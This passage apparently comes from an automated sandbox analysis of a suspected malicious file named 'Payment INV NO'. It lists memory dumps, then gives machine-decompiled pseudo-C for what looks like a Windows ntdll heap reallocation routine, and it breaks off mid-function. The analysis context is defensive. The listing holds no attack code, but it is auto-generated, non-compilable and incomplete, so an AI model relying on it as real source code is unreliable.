                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 3446177414-3711822496
                                                          • Opcode ID: 592194870c042dc7291ae8d3eb5f4b80eb7d2f913c061ca49a2145b161941b5e
                                                          • Instruction ID: c715b026282d3fc55fcd442e1520297a1f9097b652f82af9beebc42f82f3cdb1
                                                          • Opcode Fuzzy Hash: 592194870c042dc7291ae8d3eb5f4b80eb7d2f913c061ca49a2145b161941b5e
                                                          • Instruction Fuzzy Hash: E45107713007029FDF25EF3CD8C9A2AFBA1BB94314F640A5DE551C72A6DB70A949CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B8F80 Relevance: 3.5, Strings: 2, Instructions: 961COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 94%
                                                          			E017B8F80(signed int __ecx, signed int __edx, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				char _v37;
				unsigned int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int* _v64;
				signed int _v68;
				char _v69;
				signed int _v76;
				signed int _v80;
				signed short _v84;
				signed int _v88;
				signed int _v96;
				signed short _v100;
				intOrPtr* _v104;
				unsigned int _v108;
				char _v109;
				signed char _v110;
				signed char _v111;
				signed short _v114;
				signed short _v116;
				signed int _v120;
				char _v124;
				char _v128;
				intOrPtr* _v132;
				signed int* _v136;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				unsigned int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v172;
				signed char _v180;
				signed char _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr _v200;
				signed int _v208;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t472;
				signed int _t477;
				signed int _t481;
				signed int _t486;
				signed int* _t489;
				intOrPtr* _t492;
				signed int _t493;
				signed int _t498;
				char* _t499;
				intOrPtr _t500;
				unsigned int _t508;
				signed int _t513;
				signed int _t518;
				signed int _t524;
				char _t527;
				intOrPtr _t528;
				intOrPtr _t531;
				signed char _t540;
				signed int _t561;
				signed int _t567;
				signed char _t573;
				intOrPtr _t574;
				signed int _t575;
				signed int* _t576;
				intOrPtr* _t582;
				signed int _t583;
				intOrPtr _t595;
				signed int _t610;
				signed char _t611;
				signed int _t615;
				signed char _t623;
				signed int _t625;
				signed int _t626;
				void* _t631;
				unsigned int _t648;
				intOrPtr _t649;
				signed int _t652;
				signed int* _t654;
				char* _t655;
				intOrPtr _t656;
				signed short _t666;
				signed short _t669;
				void* _t670;
				signed int _t672;
				signed char _t675;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				void* _t680;
				signed int _t683;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t698;
				signed int _t701;
				unsigned int _t703;
				unsigned int _t704;
				signed int _t705;
				signed int _t706;
				unsigned int _t707;
				signed int _t710;
				intOrPtr* _t712;
				signed int _t718;
				signed int* _t719;
				signed char _t727;
				signed char _t734;
				signed int _t736;
				signed int _t738;
				unsigned int _t742;
				unsigned int _t748;
				signed int _t751;
				signed int _t752;
				unsigned int _t753;
				signed int _t754;
				signed int _t755;
				signed char _t756;
				signed short _t758;
				signed int _t763;
				signed int _t764;
				signed int _t769;
				signed int _t772;
				intOrPtr* _t773;
				signed int* _t776;
				signed int _t777;
				signed int _t783;
				signed char _t784;
				signed short* _t785;
				signed short _t786;
				signed int _t787;
				unsigned int _t792;
				intOrPtr _t796;
				signed int _t800;
				unsigned int _t806;
				signed char _t808;
				signed int _t809;
				void* _t810;
				intOrPtr _t811;
				signed int _t814;
				signed char _t815;
				signed int _t817;
				signed int _t819;
				signed int _t821;
				void* _t822;
				intOrPtr _t823;

				_t694 = __ecx;
				_push(0xfffffffe);
				_push(0x186fce8);
				_push(0x17e17f0);
				_push( *[fs:0x0]);
				_t823 = _t822 - 0xc8;
				_t472 =  *0x188d360;
				_v12 = _v12 ^ _t472;
				_push(_t472 ^ _t821);
				 *[fs:0x0] =  &_v20;
				_v28 = _t823;
				_t675 = __edx;
				_v32 = __edx;
				_t800 = __ecx;
				_v76 = __ecx;
				_v36 = __ecx;
				_v108 = 0;
				_v37 = 0;
				_v144 = 0;
				if(_a4 == 0) {
					 *( *[fs:0x18] + 0xbf4) = 0;
					 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E0179CCC0(0);
					L142:
					_t477 = 0;
					L20:
					 *[fs:0x0] = _v20;
					return _t477;
				}
				_t806 = _a4 + 0xfffffff8;
				_t748 = _t806;
				if( *((char*)(_t806 + 7)) == 5) {
					_t748 = _t748 - (( *(_t806 + 6) & 0x000000ff) << 3);
				}
				_v44 = _t748;
				if( *((char*)(_t800 + 0xda)) != 2 ||  *((intOrPtr*)(_t800 + 0xd4)) == 0 ||  *((char*)(_t748 + 7)) >= 0) {
					__eflags = _t748 - _t800;
					if(_t748 == _t800) {
						_push(_t694);
						L0185A80D(_t800, _t748, 0, 0);
						_t477 = 0;
						goto L20;
					}
					_t751 =  *(_t800 + 0x44) | _t675;
					_v32 = _t751;
					__eflags = _t751 & 0x61000000;
					if((_t751 & 0x61000000) != 0) {
						__eflags = _t751 & 0x10000000;
						if(__eflags != 0) {
							goto L23;
						}
						_push(_a8);
						_push(_a4);
						_t477 = L01853A90(_t675, _t694, _t751, _t800, _t806, __eflags);
						goto L20;
					}
					L23:
					_t481 = _a8;
					__eflags = _t481 - 0x7fffffff;
					if(_t481 > 0x7fffffff) {
						 *( *[fs:0x18] + 0xbf4) = 0xc0000017;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E0179CCC0(0xc0000017);
						_t477 = 0;
						goto L20;
					}
					__eflags = _t481;
					if(_t481 == 0) {
						_t752 = 1;
					} else {
						_t752 = _t481;
					}
					_t486 =  *((intOrPtr*)(_t800 + 0x94)) + _t752 &  *(_t800 + 0x98);
					__eflags = _t486 - 0x10;
					if(_t486 < 0x10) {
						_t486 = 0x10;
					}
					_v48 = _t486;
					_v52 = 0;
					_v8 = 1;
					__eflags = _v32 & 0x00000001;
					if(__eflags != 0) {
						L32:
						_v8 = 2;
						__eflags =  *((char*)(_t806 + 7)) - 5;
						if( *((char*)(_t806 + 7)) == 5) {
							_t806 = _t806 - (( *(_t806 + 6) & 0x000000ff) << 3);
						}
						_t753 = _t806;
						_v44 = _t806;
						__eflags =  *(_t800 + 0x4c);
						if( *(_t800 + 0x4c) != 0) {
							 *_t806 =  *_t806 ^  *(_t800 + 0x50);
							__eflags =  *(_t806 + 3) - ( *(_t753 + 2) ^  *(_t753 + 1) ^  *_t753);
							if(__eflags != 0) {
								_push(_t694);
								L0184FA2B(_t675, _t800, _t806, _t800, _t806, __eflags);
								_t694 = _v36;
							}
						}
						_v108 = _t806;
						_t754 =  *_t806 & 0x0000ffff;
						_t489 =  *(_t800 + 0xb4);
						while(1) {
							_t677 = _t489[1];
							__eflags = _t754 - _t677;
							if(_t754 < _t677) {
								_t678 = _t677 - 1;
								__eflags = _t678;
								break;
							}
							_t698 =  *_t489;
							_v88 = _t698;
							__eflags = _t698;
							_t694 = _v36;
							if(_t698 == 0) {
								_t754 = _t677 - 1;
								_t678 = _t754;
								break;
							}
							_t489 = _v88;
						}
						__eflags = _t754 - _t678;
						if(_t754 >= _t678) {
							__eflags =  *_t489;
							if( *_t489 != 0) {
								__eflags = _t754 - _t678;
								if(_t754 == _t678) {
									goto L39;
								}
							}
							_v160 = 0;
							L41:
							__eflags = _v32 & 0x3c000100;
							if((_v32 & 0x3c000100) != 0) {
								L102:
								_v48 = _v48 + 8;
								L44:
								_t86 = _t806 + 7; // -241
								_t492 = _t86;
								_v64 = _t492;
								_t756 =  *_t492;
								_t493 = _t756 & 0x000000ff;
								_v80 = _t493;
								__eflags = _t493 & 0xffffff3f;
								if((_t493 & 0xffffff3f) == 0) {
									 *( *[fs:0x18] + 0xbf4) = 0xc000000d;
									_t808 =  *[fs:0x18];
									_v184 = _t808;
									 *((intOrPtr*)(_t808 + 0x34)) = E0179CCC0(0xc000000d);
									L101:
									_t679 = _v36;
									L92:
									_v8 = 1;
									goto L93;
								}
								__eflags = _t756 - 4;
								if(_t756 == 4) {
									_t333 = _t806 - 0x18; // -272
									_t680 = _t333;
									__eflags =  *(_t694 + 0x4c);
									if( *(_t694 + 0x4c) == 0) {
										_t758 =  *_t806;
										_v114 = _t758;
									} else {
										_t758 =  *_t806;
										_v84 = _t758;
										__eflags =  *(_t694 + 0x4c) & _t758;
										if(( *(_t694 + 0x4c) & _t758) != 0) {
											_t339 = _t694 + 0x50; // 0x1801257
											_t758 = _t758 ^  *_t339;
											__eflags = _t758;
											_v84 = _t758;
										}
										_v114 = _t758;
										_t806 = _v44;
									}
									_t701 =  *((intOrPtr*)(_t680 + 0x10)) - (_t758 & 0x0000ffff);
									_v52 = _t701;
									_t683 = ( *_t806 & 0x0000ffff) + _t701 >> 3;
									_v60 = _t683;
									_t703 = _v48 + 0x18;
									_v48 = _t703;
									_v48 = _t703;
									_v48 = _t703 + 0x00000fff & 0xfffff000;
									L98:
									_t694 = _v36;
									_v96 = _t683;
									L55:
									_t508 = _v48 >> 3;
									_t759 = _t508;
									_v68 = _t508;
									__eflags = _t508 - _t683;
									if(_t508 <= _t683) {
										_t704 = _t508 + 1;
										__eflags = _t704 - _t683;
										if(_t704 == _t683) {
											_v68 = _t704;
											_v48 = _v48 + 8;
										} else {
											_t704 = _t508;
										}
										__eflags =  *_v64 - 4;
										if( *_v64 == 4) {
											 *_t806 = _v48 - _a8;
											goto L82;
										} else {
											__eflags =  *(_t806 + 2) & 0x00000002;
											if(( *(_t806 + 2) & 0x00000002) != 0) {
												_t773 = _t806 + (( *_t806 & 0x0000ffff) - 1) * 8;
												_v132 = _t773;
												_t712 = _t806 + (_t704 - 1) * 8;
												_v104 = _t712;
												 *_t712 =  *_t773;
												 *((intOrPtr*)(_t712 + 4)) =  *((intOrPtr*)(_t773 + 4));
												_t561 =  *( *[fs:0x30] + 0x68);
												_v188 = _t561;
												__eflags = _t561 & 0x00000800;
												if((_t561 & 0x00000800) == 0) {
													L81:
													_t806 = _v44;
													_v96 = _v60;
													L82:
													_t679 = _v36;
													L83:
													_t705 = _v52;
													_t513 = _a8;
													__eflags = _t513 - _t705;
													if(_t513 <= _t705) {
														L87:
														__eflags =  *(_t679 + 0x40) & 0x00000020;
														if(( *(_t679 + 0x40) & 0x00000020) != 0) {
															 *((intOrPtr*)(_t806 + _t513 + 8)) = 0xabababab;
															 *((intOrPtr*)(_t806 + _t513 + 0xc)) = 0xabababab;
														}
														_t706 = _v68;
														__eflags = _t706 - _v96;
														if(_t706 != _v96) {
															_v172 =  *(_t806 + 2) & 0x000000fe;
															__eflags =  *_v64 - 4;
															if( *_v64 == 4) {
																_t810 = _t806 + 0xffffffe8;
																_t518 =  *( *[fs:0x30] + 0x68);
																_v196 = _t518;
																__eflags = _t518 & 0x00000800;
																if((_t518 & 0x00000800) != 0) {
																	 *((short*)(_t810 + 0xa)) = L0183E9F0(_t679,  *((intOrPtr*)(_t810 + 0xa)), _v60, _v68, 5);
																}
																_t707 = _v48;
																_v128 = _t810 + _t707;
																_v124 = (_v60 << 3) - _t707;
																_t524 = E017C174B( &_v128,  &_v124, 0x4000);
																_v164 = _t524;
																__eflags = _t524;
																if(_t524 >= 0) {
																	 *((intOrPtr*)(_t810 + 0x10)) =  *((intOrPtr*)(_t810 + 0x10)) - _v124;
																	_t806 = _v44;
																} else {
																	_t528 =  *[fs:0x30];
																	__eflags =  *(_t528 + 0xc);
																	if( *(_t528 + 0xc) == 0) {
																		_push("HEAP: ");
																		E0179B150();
																	} else {
																		E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																	}
																	_push(_v164);
																	_push(_v124);
																	E0179B150(0x17839dc, _v128);
																	_t531 =  *[fs:0x30];
																	__eflags =  *((char*)(_t531 + 2));
																	if( *((char*)(_t531 + 2)) != 0) {
																		 *0x1886378 = 1;
																		 *0x18860c0 = 0;
																		asm("int3");
																		 *0x1886378 = 0;
																	}
																	_t806 = _v44;
																}
															} else {
																_t763 = ( *_t806 & 0x0000ffff) - (_t706 & 0x0000ffff);
																_v88 = _t763;
																_v200 = _t763;
																 *_t806 = _t706;
																__eflags =  *(_t679 + 0x40) & 0x00000040;
																if(( *(_t679 + 0x40) & 0x00000040) != 0) {
																	_v64 = 1;
																} else {
																	_v64 = 0;
																}
																_t540 =  *(_t806 + 6);
																__eflags = _t540;
																if(_t540 == 0) {
																	_t764 = _t679;
																} else {
																	_t764 = (1 - (_t540 & 0x000000ff) << 0x10) + (_t806 & 0xffff0000);
																	__eflags = 1;
																}
																_v168 = _t764;
																E017BE1B9(_t679, _t764, _t806 + _t706 * 8, _v172, _v64, _t706, _v88);
															}
															_t706 = _v68;
														}
														__eflags =  *((char*)(_t806 + 7)) - 4;
														if( *((char*)(_t806 + 7)) != 4) {
															_t527 = _v48 - _a8;
															_v88 = _t527;
															__eflags = _t527 - 0x3f;
															if(_t527 >= 0x3f) {
																 *((intOrPtr*)(_t806 + _t706 * 8 - 4)) = _t527;
																 *((char*)(_t806 + 7)) = 0x3f;
															} else {
																 *((char*)(_t806 + 7)) = _t527;
															}
														}
														goto L92;
													}
													__eflags = _v32 & 0x00000008;
													if((_v32 & 0x00000008) == 0) {
														__eflags =  *(_t679 + 0x40) & 0x00000040;
														if(( *(_t679 + 0x40) & 0x00000040) == 0) {
															goto L87;
														}
														_t769 = _v52 & 0x00000003;
														__eflags = _t769;
														_v156 = _t769;
														if(_t769 != 0) {
															__eflags = 4;
															_t769 = 4 - _t769;
															_v156 = _t769;
															_t513 = _a8;
														}
														_t710 = _v52;
														_t684 = _t769 + _t710;
														_v88 = _t684;
														__eflags = _t513 - _t684;
														_t679 = _v36;
														if(_t513 > _t684) {
															_v80 = _t513;
															_v80 = _v80 - _t769;
															_t772 = _v80 - _t710 & 0xfffffffc;
															__eflags = _t772;
															if(_t772 == 0) {
																goto L87;
															}
															E017ED5E0(_v88 + 8 + _t806, _t772, 0xbaadf00d);
															L86:
															_t513 = _a8;
														}
														goto L87;
													}
													__eflags = _a4 + _t705;
													E017DFA60(_a4 + _t705, 0, _t513 - _t705);
													_t823 = _t823 + 0xc;
													goto L86;
												}
												_t811 = _v104;
												_v96 = _v60;
												_t679 = _v36;
												 *((short*)(_t811 + 2)) = L0183E9F0(_t679,  *((intOrPtr*)(_t811 + 2)), _v60, _v68, 4);
												_t806 = _v44;
												goto L83;
											}
											_t567 =  *( *[fs:0x30] + 0x68);
											_v192 = _t567;
											__eflags = _t567 & 0x00000800;
											if((_t567 & 0x00000800) != 0) {
												_t806 = _v44;
												_v109 =  *(_t806 + 3);
												_t679 = _v36;
												 *(_t806 + 3) = L0183E9F0(_t679,  *(_t806 + 3) & 0x000000ff,  *_t806 & 0x0000ffff, _v68, 4);
												_v96 = _v60;
												goto L83;
											}
											goto L81;
										}
									}
									__eflags =  *_v64 - 4;
									if( *_v64 == 4) {
										L58:
										__eflags = _v32 & 0x00000010;
										if((_v32 & 0x00000010) != 0) {
											_a4 = 0;
											goto L101;
										}
										_t717 = _v32 & 0xc003ffff;
										_v32 = _t717;
										_t121 = _t806 + 2; // -246
										_t776 = _t121;
										_t573 =  *_t776;
										__eflags = _t573 & 0x00000002;
										if((_t573 & 0x00000002) != 0) {
											_t718 = _t717 & 0xfffff1ff;
											_v32 = _t718;
											_t689 = (_t573 & 0xe0 | 0x00000010) << 0x00000004 | _t718;
											_v32 = _t689;
											_v8 = 3;
											_t717 = _t806;
											_t574 = E01791F5B(_t806);
											_v132 = _t574;
											_t575 =  *(_t574 + 2) & 0x0000ffff;
											__eflags = _t575;
											if(__eflags != 0) {
												if(__eflags >= 0) {
													_v32 = _t575 << 0x00000012 | _t689;
												}
											}
											_v8 = 2;
										} else {
											_t610 =  *( *[fs:0x30] + 0x68);
											_v208 = _t610;
											_t806 = _v44;
											__eflags = _t610 & 0x00000800;
											if((_t610 & 0x00000800) != 0) {
												_t611 =  *(_t806 + 3);
												_v110 = _t611;
												__eflags = _t611;
												if(_t611 != 0) {
													_v111 = _t611;
													_v32 = (_t611 & 0x000000ff) << 0x00000012 | _t717;
												}
											}
										}
										_t679 = _v36;
										_t130 = _t679 + 0x4c; // 0x186fd34
										_t576 = _t130;
										_v80 = _t576;
										__eflags =  *_t576;
										if( *_t576 != 0) {
											 *(_t806 + 3) =  *(_t806 + 1) ^  *_t776 ^  *_t806;
											_t134 = _t679 + 0x50; // 0x1801257
											 *_t806 =  *_t806 ^  *_t134;
											__eflags =  *_t806;
										}
										_v108 = 0;
										_v8 = 4;
										_t777 = E017B4620(_t717, _t800, _v32, _a8);
										_v56 = _t777;
										_v8 = 2;
										__eflags = _t777;
										if(_t777 != 0) {
											_t141 = _t777 - 8; // -8
											_t719 = _t141;
											_v64 = _t719;
											__eflags = _t719[1] - 5;
											if(_t719[1] == 5) {
												_t719 = _t719 - ((_t719[1] & 0x000000ff) << 3);
												_v64 = _t719;
											}
											_v136 = _t719;
											__eflags =  *_v80;
											if( *_v80 != 0) {
												_t146 = _t679 + 0x50; // 0x1801257
												 *_t719 =  *_t719 ^  *_t146;
												__eflags = _t719[0] - (_t719[0] ^ _t719[0] ^  *_t719);
												_t777 = _v56;
												if(__eflags != 0) {
													_push(_t719);
													L0184FA2B(_t679, _t679, _t719, _t800, _t806, __eflags);
													_t719 = _v64;
													_t777 = _v56;
												}
											}
											_v108 = _t719;
											__eflags = _t719[0] & 0x00000002;
											if((_t719[0] & 0x00000002) != 0) {
												_t582 = E01791F5B(_t719);
												_v104 = _t582;
												__eflags =  *_v80;
												if( *_v80 != 0) {
													_t241 = _t679 + 0x50; // 0x1801257
													 *_t806 =  *_t806 ^  *_t241;
													_t727 =  *(_t806 + 2) ^  *(_t806 + 1) ^  *_t806;
													__eflags =  *(_t806 + 3) - _t727;
													if(__eflags != 0) {
														_push(_t727);
														L0184FA2B(_t679, _t679, _t806, _t800, _t806, __eflags);
														_t777 = _v56;
														_t582 = _v104;
													}
												}
												_v8 = 5;
												__eflags =  *(_t806 + 2) & 0x00000002;
												if(( *(_t806 + 2) & 0x00000002) == 0) {
													 *_t582 = 0;
													 *((intOrPtr*)(_t582 + 4)) = 0;
												} else {
													_t595 = E01791F5B(_t806);
													_v132 = _t595;
													 *((intOrPtr*)(_v104 + 4)) =  *((intOrPtr*)(_t595 + 4));
												}
												_v8 = 2;
												_t719 = _v64;
												__eflags =  *(_t679 + 0x4c);
												if( *(_t679 + 0x4c) != 0) {
													 *(_t806 + 3) =  *(_t806 + 2) ^  *(_t806 + 1) ^  *_t806;
													_t259 = _t679 + 0x50; // 0x1801257
													 *_t806 =  *_t806 ^  *_t259;
												}
											}
											__eflags =  *_v80;
											if( *_v80 != 0) {
												_t719[0] = _t719[0] ^ _t719[0] ^  *_t719;
												_t159 = _t679 + 0x50; // 0x1801257
												 *_t719 =  *_t719 ^  *_t159;
												__eflags =  *_t719;
											}
											_v108 = 0;
											__eflags = _v37;
											if(_v37 != 0) {
												_t162 = _t679 + 0xc8; // 0x1803161
												E017AEB70(_t719,  *_t162);
												_v37 = 0;
												_t164 =  &_v32;
												 *_t164 = _v32 & 0xfffffffe;
												__eflags =  *_t164;
												_t777 = _v56;
											}
											_t583 = _a8;
											__eflags = _t583 - _v52;
											if(_t583 >= _v52) {
												_t583 = _v52;
											}
											E017DF3E0(_t777, _a4, _t583);
											E017B77F0(_t800, _v32, _a4);
											_t777 = _v56;
										}
										_v144 = _a4;
										_a4 = _t777;
										goto L92;
									}
									_t615 = E017BE79D(_t694, _v32, _t806, _a8, _t759);
									__eflags = _t615;
									if(_t615 != 0) {
										goto L101;
									}
									goto L58;
								}
								_t683 =  *_t806 & 0x0000ffff;
								_v96 = _t683;
								_v60 = _t683;
								__eflags = _t756 - 5;
								if(_t756 == 5) {
									_t353 = _t694 + 0x54; // 0x180126a
									_t783 =  *(_t806 + 4) & 0x0000ffff ^  *_t353 & 0x0000ffff;
								} else {
									__eflags = _t756 & 0x00000040;
									if((_t756 & 0x00000040) != 0) {
										_t783 =  *(_t806 + (_t493 & 0x0000003f) * 8 + 4) & 0x0000ffff;
									} else {
										__eflags = (_t756 & 0x0000003f) - 0x3f;
										if((_t756 & 0x0000003f) == 0x3f) {
											__eflags = _t756;
											if(_t756 >= 0) {
												__eflags =  *(_t694 + 0x4c);
												if( *(_t694 + 0x4c) == 0) {
													_t786 =  *_t806 & 0x0000ffff;
													_v116 = _t786;
												} else {
													_t786 =  *_t806;
													_v100 = _t786;
													__eflags =  *(_t694 + 0x4c) & _t786;
													if(( *(_t694 + 0x4c) & _t786) != 0) {
														_t367 = _t694 + 0x50; // 0x1801257
														_t786 = _t786 ^  *_t367;
														__eflags = _t786;
														_v100 = _t786;
													}
													_v116 = _t786;
													_t806 = _v44;
													_t683 = _v60;
													_v96 = _t683;
												}
												_t787 = _t786 & 0x0000ffff;
												_v152 = _t787;
											} else {
												_t792 = _t806 >> 0x00000003 ^  *_t806 ^  *0x188874c ^ _t694;
												__eflags = _t792;
												if(_t792 == 0) {
													_t814 = _t806 - (_t792 >> 0xd);
													__eflags = _t814;
													_t631 =  *_t814;
												} else {
													_t631 = 0;
												}
												_t787 =  *(_t631 + 0x14) & 0x0000ffff;
												_v152 = _t787;
												_t806 = _v44;
												_t683 = _v60;
												_v96 = _t683;
											}
											_t783 =  *(_t806 + _t787 * 8 - 4);
										} else {
											_t783 = _v80 & 0x0000003f;
											__eflags = _t783;
										}
									}
								}
								_v120 = _t783;
								_v52 = _t683 * 8 - _t783;
								_t99 = _t694 + 0xe0; // 0x1802ed0
								__eflags = _t683 - ( *_t99 & 0x0000ffff);
								if(_t683 >= ( *_t99 & 0x0000ffff)) {
									goto L55;
								} else {
									_t784 =  *((intOrPtr*)((_t683 >> 3) + _t694 + 0xe2));
									_t623 = 1 << (_t683 & 0x00000007);
									_t683 = _v60;
									__eflags = _t784 & _t623;
									if((_t784 & _t623) != 0) {
										_t806 = _v44;
										goto L98;
									} else {
										_t106 = _v36 + 0xdc; // 0x0
										_v96 = _t683;
										_t785 =  *_t106 + _t683 * 2;
										_t625 =  *_t785 & 0x0000ffff;
										__eflags = _t625 - 1;
										if(_t625 > 1) {
											_t626 = _t625 - 1;
											__eflags = _t626;
											 *_t785 = _t626;
										}
										_t806 = _v44;
										goto L55;
									}
								}
							}
							__eflags =  *(_t694 + 0xbc);
							if( *(_t694 + 0xbc) != 0) {
								goto L102;
							}
							__eflags =  *(_t806 + 2) & 0x00000002;
							if(( *(_t806 + 2) & 0x00000002) != 0) {
								goto L102;
							}
							goto L44;
						}
						L39:
						_t755 = _t754 - _t489[5];
						__eflags = _t489[2];
						if(_t489[2] != 0) {
							_t755 = _t755 + _t755;
						}
						_v160 = _t489[8] + _t755 * 4;
						goto L41;
					} else {
						_t796 =  *((intOrPtr*)(_t800 + 0xc8));
						_t675 =  *[fs:0x18];
						asm("lock btr dword [eax], 0x0");
						if(__eflags >= 0) {
							__eflags =  *((intOrPtr*)(_t796 + 0xc)) -  *((intOrPtr*)(_t675 + 0x24));
							if( *((intOrPtr*)(_t796 + 0xc)) ==  *((intOrPtr*)(_t675 + 0x24))) {
								 *(_t796 + 8) =  *(_t796 + 8) + 1;
								goto L30;
							}
							_v148 = 0;
							__eflags =  *0x1887bc8;
							if( *0x1887bc8 != 0) {
								_v69 = 0;
								 *( *[fs:0x18] + 0xbf4) = 0xc0000194;
								_t815 =  *[fs:0x18];
								_v180 = _t815;
								 *((intOrPtr*)(_t815 + 0x34)) = E0179CCC0(0xc0000194);
								_t679 = _v36;
								L93:
								_v8 = 0xfffffffe;
								E017B97B8(_t679);
								_t498 =  *( *[fs:0x30] + 0x50);
								__eflags = _t498;
								if(_t498 != 0) {
									__eflags =  *_t498;
									if( *_t498 == 0) {
										goto L94;
									}
									_t499 =  *( *[fs:0x30] + 0x50) + 0x226;
									L95:
									__eflags =  *_t499;
									if( *_t499 != 0) {
										_t500 =  *[fs:0x30];
										__eflags =  *(_t500 + 0x240) & 0x00000001;
										if(( *(_t500 + 0x240) & 0x00000001) == 0) {
											goto L96;
										}
										_t809 = _a4;
										__eflags = _t809;
										if(_t809 != 0) {
											__eflags = _v32 & 0x00800000;
											if((_v32 & 0x00800000) == 0) {
												L018516CF(_t800, _t809, _v144, _v52, _a8, 3);
											}
										}
										goto L19;
									}
									L96:
									_t809 = _a4;
									goto L19;
								}
								L94:
								_t499 = 0x7ffe0380;
								goto L95;
							}
							E017AEEF0( *((intOrPtr*)(_t800 + 0xc8)));
							E017D4032(_t800, 1);
							_t694 = _v36;
							goto L31;
						} else {
							 *((intOrPtr*)(_t796 + 0xc)) =  *((intOrPtr*)(_t675 + 0x24));
							 *(_t796 + 8) = 1;
							L30:
							_v148 = 1;
							_t56 = _t800 + 0x204;
							 *_t56 =  *(_t800 + 0x204) + 1;
							__eflags =  *_t56;
							L31:
							_v69 = 1;
							_v37 = 1;
							_t60 =  &_v32;
							 *_t60 = _v32 ^ 0x00000001;
							__eflags =  *_t60;
							goto L32;
						}
					}
				} else {
					if((_t675 & 0x00000010) != 0) {
						goto L142;
					}
					_t817 = _t748 >> 3;
					_t648 =  *_t748 ^ _t817 ^  *0x188874c ^ _t800;
					if((_t648 & 0x0000ffff) != 0) {
						_t649 = 0;
					} else {
						_t649 =  *((intOrPtr*)(_t748 - (_t648 >> 0xd)));
					}
					_t691 =  *(_t649 + 0x14) & 0x0000ffff;
					_t734 =  *((intOrPtr*)(_t748 + 7));
					if(_t734 == 5) {
						_t736 =  *(_t748 + 4) & 0x0000ffff ^  *(_t800 + 0x54) & 0x0000ffff;
					} else {
						if((_t734 & 0x00000040) != 0) {
							_t736 =  *(_t748 + 4 + (_t734 & 0x3f) * 8) & 0x0000ffff;
						} else {
							if((_t734 & 0x0000003f) == 0x3f) {
								__eflags = _t734;
								if(_t734 >= 0) {
									__eflags =  *(_t800 + 0x4c);
									if( *(_t800 + 0x4c) == 0) {
										_t666 =  *_t748 & 0x0000ffff;
									} else {
										_t669 =  *_t748;
										__eflags =  *(_t800 + 0x4c) & _t669;
										if(( *(_t800 + 0x4c) & _t669) != 0) {
											_t669 = _t669 ^  *(_t800 + 0x50);
											__eflags = _t669;
										}
										_t666 = _t669 & 0x0000ffff;
									}
								} else {
